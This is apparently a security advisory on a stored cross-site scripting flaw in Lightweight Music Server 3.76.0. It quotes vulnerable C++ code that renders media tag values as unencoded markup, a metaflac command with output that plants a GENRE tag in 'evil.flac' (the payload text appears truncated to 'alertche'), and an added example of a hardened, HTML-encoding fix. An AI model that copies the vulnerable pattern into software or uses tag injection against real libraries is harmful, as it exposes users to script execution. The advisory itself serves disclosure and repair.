zeroscience
ZSL Bot v4.89.1.00
Code:
Lightweight Music Server (LMS) 3.76.0 (metadata) Stored XSS
Vendor: Emeric Poupon
Product web page: https://github.com/epoupon/lms
Affected version: 3.76.0
Summary: LMS (Lightweight Music Server): A specific C++ based
project focused on a low memory footprint, featuring built-in
user management and a recommendation engine.
Desc: LMS stores media file metadata tags (such as GENRE, ARTIST,
and ALBUM) exactly as written in the file and later renders them
in its web interface without HTML-encoding, resulting in stored
cross-site scripting. An attacker who gets a file with a malicious
tag into the victim's library has their payload saved during the
next library scan and executed automatically whenever a user views
that track's information or plays the file in the web UI.
--------------------------------------------------------------
/src/lms/ui/Utils.cpp (lines 131-137)
-------------------------------------
std::unique_ptr<Wt::WInteractWidget> createFilter(const Wt::WString& name, const Wt::WString& tooltip, std::string_view colorStyleClass, bool canDelete)
{
    // `name` carries the tag value read from the media file; it is concatenated
    // into the badge markup and rendered as UnsafeXHTML without encoding.
    auto res{ std::make_unique<Wt::WText>(Wt::WString{ canDelete ? "<i class=\"fa fa-times-circle\"></i> " : "" } + name, Wt::TextFormat::UnsafeXHTML) };
    res->setStyleClass("Lms-badge-cluster badge me-1 " + std::string{ colorStyleClass });
    res->setInline(true);
    return res;
}
--------------------------------------------------------------
Tested on: GNU/Linux (ARM64)
nginx
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2026-5987
Advisory URL: https://www.zeroscience.mk/#/advisories/ZSL-2026-5987
27.05.2026
--
$ metaflac --set-tag=GENRE="alertche" evil.flac
$ metaflac --list evil.flac
METADATA block #0
type: 0 (STREAMINFO)
is last: false
length: 34
minimum blocksize: 4608 samples
maximum blocksize: 4608 samples
minimum framesize: 2305 bytes
maximum framesize: 14124 bytes
sample_rate: 44100 Hz
channels: 2
bits-per-sample: 16
total samples: 4664587
MD5 signature: 2aeee69c0153cb652c718dfdf0e9ff2d
METADATA block #1
type: 4 (VORBIS_COMMENT)
is last: false
length: 98
vendor string: Lavf57.83.100
comments: 2
comment[0]: encoder=Lavf57.83.100
comment[1]: GENRE=alertche
METADATA block #2
type: 1 (PADDING)
is last: true
length: 8140
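The root cause in the advisory is the `createFilter()` pattern: a trusted icon fragment and an untrusted tag value are joined into one string and handed to the widget as UnsafeXHTML. The example below is added here and is not LMS code; it stands in for the Wt widget with plain `std::string` so it builds without the library, and the function names `htmlEscape`, `filterMarkupVulnerable`, `filterMarkupFixed` and `hasRawTagAfterPrefix` are assumed for illustration. It places the vulnerable concatenation beside the hardened form, which entity-encodes only the untrusted part so the application's own markup still renders:

```cpp
// Added example (not LMS code): the untrusted tag value is the `name`
// argument of createFilter(); the vulnerable path concatenates it into
// markup rendered as UnsafeXHTML, the fixed path HTML-encodes it first.
#include <cassert>
#include <iostream>
#include <string>
#include <string_view>

// Minimal HTML entity encoding for text placed into element content or a
// double-quoted attribute. Wt ships Wt::Utils::htmlEncode for the same job;
// this stand-alone version avoids the dependency.
std::string htmlEscape(std::string_view in)
{
    std::string out;
    out.reserve(in.size());
    for (char c : in)
    {
        switch (c)
        {
        case '&':  out += "&amp;";  break;
        case '<':  out += "&lt;";   break;
        case '>':  out += "&gt;";   break;
        case '"':  out += "&quot;"; break;
        case '\'': out += "&#39;";  break;
        default:   out += c;
        }
    }
    return out;
}

// The application's own, trusted markup fragment (the delete icon).
constexpr std::string_view kDeleteIcon{ "<i class=\"fa fa-times-circle\"></i> " };

// Mirrors the advisory's createFilter(): the badge body is built by string
// concatenation and would be handed to the widget as UnsafeXHTML, so whatever
// the tag contains becomes live markup.
std::string filterMarkupVulnerable(std::string_view name, bool canDelete)
{
    std::string markup{ canDelete ? std::string{ kDeleteIcon } : std::string{} };
    markup += name;
    return markup;
}

// Hardened form: the trusted icon fragment stays as markup, the untrusted tag
// value is entity-encoded before it joins the string. The result can still be
// rendered as UnsafeXHTML because it no longer carries caller-controlled markup.
std::string filterMarkupFixed(std::string_view name, bool canDelete)
{
    std::string markup{ canDelete ? std::string{ kDeleteIcon } : std::string{} };
    markup += htmlEscape(name);
    return markup;
}

// Returns true when a raw '<' survives after the trusted prefix, i.e. the tag
// value was able to open an element of its own. Useful as a unit-test oracle.
bool hasRawTagAfterPrefix(const std::string& markup)
{
    std::string_view body{ markup };
    if (body.substr(0, kDeleteIcon.size()) == kDeleteIcon)
        body.remove_prefix(kDeleteIcon.size());
    return body.find('<') != std::string_view::npos;
}

int main()
{
    // Constructed tag value holding the characters that matter in HTML context.
    const std::string tag{ "Rock & <Roll> \"Live\"" };
    std::cout << "vulnerable: " << filterMarkupVulnerable(tag, true) << "\n";
    std::cout << "fixed:      " << filterMarkupFixed(tag, true) << "\n";
    return 0;
}
```

Encoding at the point where untrusted text meets markup is the right fix here; switching the whole widget to `Wt::TextFormat::Plain` would also close the hole but would render the icon `<i>` tag literally, which is presumably why the original code reached for UnsafeXHTML in the first place.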
Zero Science Lab — Macedonian Information Security Research & Development Laboratory